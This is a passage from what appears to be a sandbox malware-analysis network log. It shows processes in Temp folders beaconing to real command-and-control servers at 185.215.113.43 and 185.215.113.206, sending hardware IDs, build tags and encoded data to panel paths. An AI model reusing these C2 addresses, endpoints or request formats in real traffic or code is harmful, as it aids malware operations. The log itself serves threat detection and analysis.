Nov 4, 2024 17:33:39.930540085 CET	1236	IN	Data Raw: e0 c2 63 29 31 31 76 70 d9 c8 cb 17 22 e7 a8 09 c1 c1 79 74 11 05 34 50 03 cf 1b 29 3f 8c 70 a8 35 e7 82 28 d6 af db 95 e6 83 a7 99 ed a0 33 70 96 52 c0 1b 51 6d 52 b1 26 27 1c 9e 9b f2 f3 d3 4c 17 83 28 aa af 46 96 d6 9f 7a d7 dd ef 2a 21 c2 6b Data Ascii: c)11vp"yt4P)?p5(3pRQmR&'L(Fz!kvo3Q3BKuc/2('/>l"subP'bc)\1mS&'>* /7e&L&WBeH+9R6 nl ("6's7eR*!@83#3W-d
Nov 4, 2024 17:33:39.935298920 CET	1236	IN	Data Raw: 73 7f 56 df 2e 77 a0 92 e6 d9 70 7a 0a a5 43 cc ed 8f 2e d8 d2 96 a0 83 a4 ec 07 9d 1b 73 a1 82 56 b1 eb cb 51 c9 7b 50 16 ae cd 5f 6d 67 e8 c3 48 f6 70 dc 34 30 88 15 20 04 8b ba 55 9a de c7 29 25 d4 13 4e 34 57 0b c8 29 af 13 17 b3 bb 67 c3 79 Data Ascii: sV.wpzC.sVQ{P_mgHp40 U)%N4W)gyI5G-K@veNYDHQ~&E&<7If$Wl"B$1&d#\|&a8D`+;)qeo3m<atu^}&^\|D98{,8y{wq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50223	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:39.382703066 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50224	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:41.013122082 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:41.928376913 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	50225	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:42.387212992 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:43.686532974 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:43.690859079 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build"tale------BFIIEHJDBKJKECBFHDGH--
Nov 4, 2024 17:33:43.972019911 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50226	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:43.461278915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:44.401768923 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50227	185.215.113.206	80	7784	C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:44.766855955 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:33:45.689937115 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:33:45.694518089 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"tale------CBGCAFIIECBFIDHIJKFB--
Nov 4, 2024 17:33:45.981934071 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:33:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50228	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:46.029984951 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:46.941582918 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50230	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:48.461668968 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:49.396121979 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50231	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:51.019843102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:51.930859089 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50232	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:53.458532095 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:54.377827883 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50233	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:56.018347025 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:33:56.930706978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50234	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:33:58.455037117 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:33:59.405586004 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:33:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50245	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:01.032496929 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:01.942203045 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50247	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:03.472140074 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:04.381057978 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50248	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:06.008739948 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:06.909804106 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50249	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:08.427069902 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:09.361577034 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50251	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:10.984257936 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:11.909854889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50252	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:13.444459915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:14.365571022 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50253	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:16.002542019 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:16.915946960 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50255	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:18.436467886 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:34:19.344490051 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50256	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:34:20.973545074 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:34:21.912511110 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:34:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50257	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
